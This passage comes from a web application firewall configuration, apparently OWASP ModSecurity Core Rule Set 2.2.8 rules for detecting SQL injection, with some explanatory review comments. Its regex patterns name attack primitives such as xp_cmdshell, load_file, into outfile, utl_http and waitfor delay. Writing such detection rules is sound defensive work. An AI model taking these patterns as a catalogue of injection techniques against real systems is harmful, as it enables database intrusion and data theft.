REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(/\*!?|\*/|[';]--|--[\s\r\n\v\f]|(?:--[^-]*?-)|([^\-&])#.*?[\s\r\n\v\f]|;?\\x00)" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'981231',t:none,t:urlDecodeUni,block,msg:'SQL Comment Sequence Detected.',severity:'2',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.sql_injection_score=+1,setvar:'tx.msg=%{rule.msg}',setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # -=[ SQL Hex Evasion Methods ]=- # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:\A|[^\d])0x[a-f\d]{3,}[a-f\d]*)+" 
"phase:2,id:'981260',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:urlDecodeUni,block,msg:'SQL Hex Encoding Identified',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # -=[ String Termination/Statement Ending Injection Testing ]=- # # Identifies common initial SQLi probing requests where attackers insert/append # quote characters to the existing normal payload to see how the app/db responds. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(^[\"'`´’‘;]+|[\"'`´’‘;]+$)" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,block,msg:'SQL Injection Attack: Common Injection Testing Detected',id:'981318',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # -=[ SQL Operators ]=- # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(\!\=|\&\&|\|\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\s+between\s+0\s+and)|(?:is\s+null)|(like\s+null)|(?:(?:^|\W)in[+\s]*\([\s\d\"]+[^()]*\))|(?:xor|<>|rlike(?:\s+binary)?)|(?:regexp\s+binary))" 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,block,msg:'SQL Injection Attack: SQL Operator Detected',id:'981319',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.notice_anomaly_score},setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # -=[ SQL Tautologies ]=- # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:([\s'\"`´’‘\(\)]*?)\b([\d\w]++)([\s'\"`´’‘\(\)]*?)(?:(?:=|<=>|r?like|sounds\s+like|regexp)([\s'\"`´’‘\(\)]*?)\2\b|(?:!=|<=|>=|<>|<|>|\^|is\s+not|not\s+like|not\s+regexp)([\s'\"`´’‘\(\)]*?)(?!\2)([\d\w]+)\b))" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,multiMatch,t:none,t:urlDecodeUni,t:replaceComments,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack: SQL Tautology Detected.',id:'950901',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # -=[ Detect DB Names ]=- # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* 
"(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\.\.sysdatabases|ysql\.db)|s(?:ys(?:\.database_name|aux)|chema(?:\W*\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_nam)e\W*\(|information_schema|pg_(catalog|toast)|northwind|tempdb))" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack: Common DB Names Detected',id:'981320',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # SQL Keyword Anomaly Scoring # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm select show top distinct from dual where group by order having limit offset union rownum as (case" "phase:2,id:'981300',t:none,t:urlDecodeUni,t:lowercase,nolog,pass,nolog,setvar:'tx.sqli_select_statement=%{tx.sqli_select_statement} %{matched_var}'" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord select" "phase:2,id:'981301',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord show" "phase:2,id:'981302',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord top" "phase:2,id:'981303',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord distinct" 
"phase:2,id:'981304',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord from" "phase:2,id:'981305',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord dual" "phase:2,id:'981306',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord where" "phase:2,id:'981307',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@contains group by" "phase:2,id:'981308',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@contains order by" "phase:2,id:'981309',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord having" "phase:2,id:'981310',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord limit" "phase:2,id:'981311',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord offset" "phase:2,id:'981312',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord union" "phase:2,id:'981313',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@contains union all" "phase:2,id:'981314',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@contains rownum as" "phase:2,id:'981315',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule 
TX:SQLI_SELECT_STATEMENT "@contains (case" "phase:2,id:'981316',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1"

# Threshold rule for the SQL keyword counter: fires once
# TX:SQLI_SELECT_STATEMENT_COUNT reaches 3, then adds the warning-level
# anomaly score and 1 to tx.sql_injection_score.
# The counter is per transaction, not per parameter: the keyword rules that
# feed it read one shared TX:SQLI_SELECT_STATEMENT string, so keywords spread
# over several cookies/arguments are counted together.
# NOTE(review): logdata expands %{TX.0}, but this rule uses the numeric @ge
# operator and has no "capture" action, so TX.0 is not set by this rule; any
# value shown is presumably left over from an earlier capturing rule.
# MATCHED_VAR here is the counter itself, so the alert does not name the
# parameter that carried the keywords - look at the request parameters in the
# audit log when triaging.
SecRule TX:SQLI_SELECT_STATEMENT_COUNT "@ge 3" "phase:2,t:none,block,id:'981317',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',msg:'SQL SELECT Statement Anomaly Detection Alert',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.sql_injection_score=+1,setvar:'tx.msg=%{rule.msg}',setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"

#
# Blind SQL injection
#
# Matches database catalog/metadata object names (sys.user_*, msys*, pg_class,
# all_objects, ...) and timing/position helpers (waitfor delay, locate(,
# instr() after urlDecodeUni, and scores a hit as critical.
# Several alternatives are bare identifiers (rownum, table_name, column_name,
# substr, user_password); expect false positives on fields that legitimately
# carry SQL or schema text and add targeted exclusions rather than lowering
# the score.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:\b(?:(?:s(?:ys\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\b.{0,40}\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\.(db|user))|c(?:onstraint_type|harindex)|waitfor\b\W*?\bdelay|attnotnull)\b|(?:locate|instr)\W+\()|\@\@spid\b)|\b(?:(?:s(?:ys(?:(?:(?:process|tabl)e|filegroup|object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubstr(?:ing)?)|user_(?:(?:(?:constrain|objec)t|tab(?:_column|le)|ind_column|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|xtype\W+\bchar|mb_users|rownum)\b|t(?:able_name\b|extpos\W+\()))" \
        "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'Blind SQL Injection Attack',id:'950007',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}:
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # SQL injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv6|not_null|not|null|used_lock))?|n(?:et6?_(aton|ntoa)|s(?:ert|tr)|terval)?|f(null)?)|u(?:n(?:compress(?:ed_length)?|ix_timestamp|hex)|tc_(date|time|timestamp)|p(?:datexml|per)|uid(_short)?|case|ser)|l(?:o(?:ca(?:l(timestamp)?|te)|g(2|10)?|ad_file|wer)|ast(_day|_insert_id)?|e(?:(?:as|f)t|ngth)|case|trim|pad|n)|t(?:ime(stamp|stampadd|stampdiff|diff|_format|_to_sec)?|o_(base64|days|seconds|n?char)|r(?:uncate|im)|an)|m(?:a(?:ke(?:_set|date)|ster_pos_wait|x)|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:nth(name)?|d)|d5)|r(?:e(?:p(?:lace|eat)|lease_lock|verse)|o(?:w_count|und)|a(?:dians|nd)|ight|trim|pad)|f(?:i(?:eld(_in_set)?|nd_in_set)|rom_(base64|days|unixtime)|o(?:und_rows|rmat)|loor)|a(?:es_(?:de|en)crypt|s(?:cii(str)?|in)|dd(?:dat|tim)e|(?:co|b)s|tan2?|vg)|p(?:o(?:sition|w(er)?)|eriod_(add|diff)|rocedure_analyse|assword|i)|b(?:i(?:t_(?:length|count|x?or|and)|n(_to_num)?)|enchmark)|e(?:x(?:p(?:ort_set)?|tract(value)?)|nc(?:rypt|ode)|lt)|v(?:a(?:r(?:_(?:sam|po)p|iance)|lues)|ersion)|g(?:r(?:oup_conca|eates)t|et_(format|lock))|o(?:(?:ld_passwo)?rd|ct(et_length)?)|we(?:ek(day|ofyear)?|ight_string)|n(?:o(?:t_in|w)|ame_const|ullif)|(rawton?)?hex(toraw)?|qu(?:arter|ote)|(pg_)?sleep|year(week)?|d?count|xmltype|hour)\W*\(|\b(?:(?:s(?:elect\b(?:.{1,100}?\b(?:(?:length|count|top)\b.{1,100}?\bfrom|from\b.{1,100}?\bwhere)|.*?\b(?:d(?:ump\b.*\bfrom|ata_type)|(?:to_(?:numbe|cha)|i
nst)r))|p_(?:sqlexec|sp_replwritetovarbin|sp_help|addextendedproc|is_srvrolemember|prepare|sp_password|execute(?:sql)?|makewebtask|oacreate)|ql_(?:longvarchar|variant))|xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|terminate|xp_servicecontrol|xp_ntsec_enumdomains|xp_terminate_process|e(?:xecresultset|numdsn)|availablemedia|loginconfig|cmdshell|filelist|dirtree|makecab|ntsec)|u(?:nion\b.{1,100}?\bselect|tl_(?:file|http))|d(?:b(?:a_users|ms_java)|elete\b\W*?\bfrom)|group\b.*\bby\b.{1,100}?\bhaving|open(?:rowset|owa_util|query)|load\b\W*?\bdata\b.*\binfile|(?:n?varcha|tbcreato)r|autonomous_transaction)\b|i(?:n(?:to\b\W*?\b(?:dump|out)file|sert\b\W*?\binto|ner\b\W*?\bjoin)\b|(?:f(?:\b\W*?\(\W*?\bbenchmark|null\b)|snull\b)\W*?\()|print\b\W*?\@\@|cast\b\W*?\()|c(?:(?:ur(?:rent_(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)\W*\(|o(?:(?:n(?:v(?:ert(?:_tz)?)?|cat(?:_ws)?|nection_id)|(?:mpres)?s|ercibility|alesce|t)\W*\(|llation\W*\(a))|d(?:(?:a(?:t(?:e(?:(_(add|format|sub))?|diff)|abase)|y(name|ofmonth|ofweek|ofyear)?)|e(?:(?:s_(de|en)cryp|faul)t|grees|code)|ump)\W*\(|bms_\w+\.\b)|(?:;\W*?\b(?:shutdown|drop)|\@\@version)\b|\butl_inaddr\b|\bsys_context\b|'(?:s(?:qloledb|a)|msdasql|dbo)'))" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.6',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'950001',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" SecRule 
REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\b(?i:having)\b\s+(\d{1,10}|'[^=]{1,10}')\s*?[=<>]|(?i:\bexecute(\s{1,5}[\w\.$]{1,5}\s{0,3})?\()|\bhaving\b ?(?:\d{1,10}|[\'\"][^=]{1,10}[\'\"]) ?[=<>]+|(?i:\bcreate\s+?table.{0,20}?\()|(?i:\blike\W*?char\W*?\()|(?i:(?:(select(.*?)case|from(.*?)limit|order\sby)))|exists\s(\sselect|select\Sif(null)?\s\(|select\Stop|select\Sconcat|system\s\(|\b(?i:having)\b\s+(\d{1,10})|'[^=]{1,10}')" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959070',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:\bor\b ?(?:\d{1,10}|[\'\"][^=]{1,10}[\'\"]) ?[=<>]+|(?i:'\s+x?or\s+.{1,20}[+\-!<>=])|\b(?i:x?or)\b\s+(\d{1,10}|'[^=]{1,10}')|\b(?i:x?or)\b\s+(\d{1,10}|'[^=]{1,10}')\s*?[=<>])" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959071',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" SecRule 
REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i)\b(?i:and)\b\s+(\d{1,10}|'[^=]{1,10}')\s*?[=]|\b(?i:and)\b\s+(\d{1,10}|'[^=]{1,10}')\s*?[<>]|\band\b ?(?:\d{1,10}|[\'\"][^=]{1,10}[\'\"]) ?[=<>]+|\b(?i:and)\b\s+(\d{1,10}|'[^=]{1,10}')" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959072',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|!REQUEST_HEADERS:via "(?i:\b(?:coalesce\b|root\@))" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,id:'950908',msg:'SQL Injection Attack.',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* 
"(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv6|not_null|not|null|used_lock))?|n(?:et6?_(aton|ntoa)|s(?:ert|tr)|terval)?|f(null)?)|u(?:n(?:compress(?:ed_length)?|ix_timestamp|hex)|tc_(date|time|timestamp)|p(?:datexml|per)|uid(_short)?|case|ser)|l(?:o(?:ca(?:l(timestamp)?|te)|g(2|10)?|ad_file|wer)|ast(_day|_insert_id)?|e(?:(?:as|f)t|ngth)|case|trim|pad|n)|t(?:ime(stamp|stampadd|stampdiff|diff|_format|_to_sec)?|o_(base64|days|seconds|n?char)|r(?:uncate|im)|an)|m(?:a(?:ke(?:_set|date)|ster_pos_wait|x)|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:nth(name)?|d)|d5)|r(?:e(?:p(?:lace|eat)|lease_lock|verse)|o(?:w_count|und)|a(?:dians|nd)|ight|trim|pad)|f(?:i(?:eld(_in_set)?|nd_in_set)|rom_(base64|days|unixtime)|o(?:und_rows|rmat)|loor)|a(?:es_(?:de|en)crypt|s(?:cii(str)?|in)|dd(?:dat|tim)e|(?:co|b)s|tan2?|vg)|p(?:o(?:sition|w(er)?)|eriod_(add|diff)|rocedure_analyse|assword|i)|b(?:i(?:t_(?:length|count|x?or|and)|n(_to_num)?)|enchmark)|e(?:x(?:p(?:ort_set)?|tract(value)?)|nc(?:rypt|ode)|lt)|v(?:a(?:r(?:_(?:sam|po)p|iance)|lues)|ersion)|g(?:r(?:oup_conca|eates)t|et_(format|lock))|o(?:(?:ld_passwo)?rd|ct(et_length)?)|we(?:ek(day|ofyear)?|ight_string)|n(?:o(?:t_in|w)|ame_const|ullif)|(rawton?)?hex(toraw)?|qu(?:arter|ote)|(pg_)?sleep|year(week)?|d?count|xmltype|hour)\W*?\(|\b(?:(?:s(?:elect\b(?:.{1,100}?\b(?:(?:length|count|top)\b.{1,100}?\bfrom|from\b.{1,100}?\bwhere)|.*?\b(?:d(?:ump\b.*?\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:sqlexec|sp_replwritetovarbin|sp_help|addextendedproc|is_srvrolemember|prepare|sp_password|execute(?:sql)?|makewebtask|oacreate)|ql_(?:longvarchar|variant))|xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|terminate|xp_servicecontrol|xp_ntsec_enumdomains|xp_terminate_process|e(?:xecresultset|numdsn)|availa
blemedia|loginconfig|cmdshell|filelist|dirtree|makecab|ntsec)|u(?:nion\b.{1,100}?\bselect|tl_(?:file|http))|d(?:b(?:a_users|ms_java)|elete\b\W*?\bfrom)|group\b.*?\bby\b.{1,100}?\bhaving|open(?:rowset|owa_util|query)|load\b\W*?\bdata\b.*?\binfile|(?:n?varcha|tbcreato)r|autonomous_transaction)\b|i(?:n(?:to\b\W*?\b(?:dump|out)file|sert\b\W*?\binto|ner\b\W*?\bjoin)\b|(?:f(?:\b\W*?\(\W*?\bbenchmark|null\b)|snull\b)\W*?\()|print\b\W*?\@\@|cast\b\W*?\()|c(?:(?:ur(?:rent_(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)\W*?\(|o(?:(?:n(?:v(?:ert(?:_tz)?)?|cat(?:_ws)?|nection_id)|(?:mpres)?s|ercibility|alesce|t)\W*?\(|llation\W*?\(a))|d(?:(?:a(?:t(?:e(?:(_(add|format|sub))?|diff)|abase)|y(name|ofmonth|ofweek|ofyear)?)|e(?:(?:s_(de|en)cryp|faul)t|grees|code)|ump)\W*?\(|bms_\w+\.\b)|(?:;\W*?\b(?:shutdown|drop)|\@\@version)\b|\butl_inaddr\b|\bsys_context\b|'(?:s(?:qloledb|a)|msdasql|dbo)'))" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.6',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959073',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # [ SQL Injection Character Anomaly Usage ] # # These rules attempted to gauge when there is an exccesive use of # meta-characters within a single parameter payload. # # The most likely false positive instances will be free-form text fields. # Adjust the the @ge operator value appropriately for your site. Increasing # the score will reduce false positives but may also decrease detection of # obfuscated attack payloads. 
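#
# How the two rules below count: the character class matches one
# meta-character, ".*?" skips to the next one, and the quantifier is the
# threshold - {8,} for cookie values and names, {4,} for argument names/values
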